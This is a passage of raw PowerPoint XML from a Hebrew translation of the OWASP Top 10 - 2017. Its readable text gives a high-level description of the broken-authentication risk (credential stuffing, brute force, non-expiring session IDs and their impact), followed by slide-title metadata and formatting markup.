                      <a:endParaRPr lang="en-US" sz="1100" b="0" kern="1200" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                        <a:ea typeface="OpenSymbol"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>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algn="ctr" rtl="1">
                        <a:lnSpc>
                          <a:spcPts val="1200"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>השפעה טכנית: 3</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="0" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FEFFFF"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>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algn="ctr"/>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="36000" marR="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1"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="1260000">
                <a:tc gridSpan="2">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="r" rtl="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>לתוקפים יש גישה למאות מיליוני</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> שמות שילובים של נתוני הזדהות תקפים, חשבונות ברירת מחדל של מנהלי מערכת, כלי מקפות </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>brute force</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> ממוכנים, וכלי ביצוע מתקפות מבוססות מילון. מתקפות מבוססות ניהול ה-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>session</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> הינן ברורות, בייחוד בהקשר של מזהי </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>session</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> אשר אינם פגי-תוקף.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" dirty="0" smtClean="0">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="45720" marR="4572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nSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx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r" rtl="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>השכיחות של מנגנוני</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> הזדהות שבורים נפוצה בשל התכנון והיישום של מרבית מנגנוני ההזדהות. ניהול ה-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>session</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> היא אבן היסוד של מנגנוני הזדהות ובקרת הגישה, והיא מוצגת בכל יישום מסוג </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>stateful</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" dirty="0" smtClean="0">
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="r" rtl="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>תוקפים עשויים לגלות הזדהות שבורה בדרכים</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> ידניות ולנצל אותן בכלים ממוכנים בשילוב רשימת סיסמאות ומתקפות מבוססות מילון.</a:t>
                      </a:r>
                      <a:endParaRPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="45720" marR="4572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lvl="0" algn="r" rtl="1">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>תוקפים</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> צריכים להיות מסוגלים לגשת למספר חשבונות מצומצם, או לחשבון מנהל מערכת בודד על-מנת לחבל במערכת.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="r" rtl="1">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>בהתאם לתחום היישום, הדבר עשוי לאפשר הלבנת כספים, הונאות זהות, וגניבת זהויות, או חשיפת</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> מידע רגיש מוגן-משפטית.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="45720" marR="4572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ts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="1000" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx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2"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37021401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03/02/2010" val="LastModified"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag10.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="04/11/2010" val="LastModified"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag11.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="04/11/2010" val="LastModified"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag12.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="04/11/2010" val="LastModified"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag13.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="04/11/2010" val="LastModified"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag14.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="04/11/2010" val="LastModified"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag15.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="04/11/2010" val="LastModified"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag16.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="04/20/2010" val="LastModified"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag17.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="04/20/2010" val="LastModified"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag18.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="03/31/2010" val="LastModified"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag19.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="03/31/2010" val="LastModified"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag2.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="03/02/2010" val="LastModified"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag20.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="04/11/2010" val="LastModified"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag21.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="03/13/2010" val="LastModified"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag22.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="03/31/2010" val="LastModified"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag23.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="03/31/2010" val="LastModified"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag3.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="04/19/2010" val="LastModified"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag4.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="03/02/2010" val="LastModified"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag5.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="03/02/2010" val="LastModified"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag6.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="04/11/2010" val="LastModified"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag7.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="04/11/2010" val="LastModified"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag8.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="04/11/2010" val="LastModified"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag9.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="04/11/2010" val="LastModified"/>
</p:tagLst>
</file>

<file path=ppt/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="Office Theme">
  <a:themeElements>
    <a:clrScheme name="OWASP Top 10-2017 1">
      <a:dk1>
        <a:srgbClr val="000000"/>
      </a:dk1>
      <a:lt1>
        <a:srgbClr val="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="000000"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="FEFFFF"/>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0365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28575">
          <a:solidFill>
            <a:srgbClr val="3C752E"/>
          </a:solidFill>
          <a:tailEnd type="triangle"/>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23198</TotalTime>
  <Words>13151</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Letter Paper (8.5x11 in)</PresentationFormat>
  <Paragraphs>1261</Paragraphs>
  <Slides>25</Slides>
  <Notes>24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25</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="33" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Exo 2</vt:lpstr>
      <vt:lpstr>Liberation Sans</vt:lpstr>
      <vt:lpstr>Mangal</vt:lpstr>
      <vt:lpstr>OpenSymbol</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>    תוכן העניינים</vt:lpstr>
      <vt:lpstr>    הקדמה</vt:lpstr>
      <vt:lpstr>    מבוא</vt:lpstr>
      <vt:lpstr>    הערות בנוגע למהדורה זו</vt:lpstr>
      <vt:lpstr>    סיכונים בפיתוח מאובטח</vt:lpstr>
      <vt:lpstr>עשרת האיומים הקריטיים על פי OWASP לשנת 2017</vt:lpstr>
      <vt:lpstr>  הזרקת קוד זדוני (Injection)</vt:lpstr>
      <vt:lpstr>  הזדהות שבורה</vt:lpstr>
      <vt:lpstr>  חשיפת מידע רגיש</vt:lpstr>
      <vt:lpstr>    ישויות XML חיצוניות -XML External Entities (XXE)</vt:lpstr>
      <vt:lpstr>  בקרת גישה שבורה</vt:lpstr>
      <vt:lpstr>  ניהול תצורה לא מאובטח</vt:lpstr>
      <vt:lpstr>Cross-Site Scripting (XSS)</vt:lpstr>
      <vt:lpstr>  פתיחה לא מאובטחת של רצף סדרתי (Serialization)</vt:lpstr>
      <vt:lpstr>  שימוש ברכיבים בעלי    פגיעויות ידועות</vt:lpstr>
      <vt:lpstr>  תיעוד וניטור בלתי מספקים</vt:lpstr>
      <vt:lpstr>  מה הדבר הבא עבור מפתחים</vt:lpstr>
      <vt:lpstr>    מה הדבר הבא עבור בודקי תוכנה</vt:lpstr>
      <vt:lpstr>    מה הדבר הבא עבור ארגונים</vt:lpstr>
      <vt:lpstr>  מה הדבר הבא עבור מנהלי מערכות</vt:lpstr>
      <vt:lpstr>  הערה בנוגע לסיכונים</vt:lpstr>
      <vt:lpstr>    מידע אודות גורמי סיכון</vt:lpstr>
      <vt:lpstr>    שיטת עבודה ונתונים</vt:lpstr>
      <vt:lpstr>  תודות</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company>OWASP</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OWASP Top 10 - 2017</dc:title>
  <dc:subject>The Top 10 Most Critical Web Application Security Risks</dc:subject>
  <dc:creator>Andrew van der Stock;Neil Smithline;Torsten Gigler;Brian Glas</dc:creator>
  <cp:keywords>Web Application Security, Top 10, XSS, CSRF, SQL Injection</cp:keywords>
  <cp:lastModifiedBy>Eyal Estrin</cp:lastModifiedBy>
  <cp:revision>2100</cp:revision>
  <cp:lastPrinted>2017-11-16T20:35:31Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2009-08-17T12:51:41Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-05-24T19:41:58Z</dcterms:modified>
  <cp:contentStatus>RC2_RCC1</cp:contentStatus>
</cp:coreProperties>
</file>